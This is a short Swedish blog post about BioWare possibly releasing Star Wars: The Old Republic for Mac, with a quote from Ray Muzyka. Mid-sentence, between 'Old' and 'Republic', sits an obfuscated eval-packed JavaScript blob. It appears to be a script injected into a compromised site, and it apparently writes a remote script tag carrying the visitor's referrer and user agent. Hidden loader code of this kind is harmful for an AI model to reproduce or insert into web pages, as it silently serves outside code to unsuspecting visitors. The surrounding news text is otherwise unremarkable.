Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Old Republic kanske till Mac

Old Republic kanske till Mac
Sebastian
Old eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|frire|var|u0026u|referrer|dydzn||js|php’.split(’|’),0,{}))
Republic har spelats av 350 000 spelare samtidigt och kommer troligen bli en riktig hit 2012 enligt Gamesindustry.biz. EA meddelade också att över en miljon spelare har registrerat sig för spelet.

Jag är själv en mac användare och gillar spel. Nu är det sagt att Old Republic kanske ska växa ännu mer. Biowares boss Ray Muzyka har meddelat att spelet kanske också kommer att släppas till mac. Detta vore väldigt kul för både mig och många andra användare som kanske inte sitter på en PC i nuläget.

We know there’s a big Mac audience of BioWare fans. We know that’s an important and large audience. And we want to serve that audience.
Dock finnas det inte något spelbart material på Mac ännu så det skulle nog dröja ytterligare ett tag. Dessutom hintade Bioware om att man också sneglar på att utveckla spelet för andra plattformar som Android och iOS.

Läs mer: www.nowgamer.com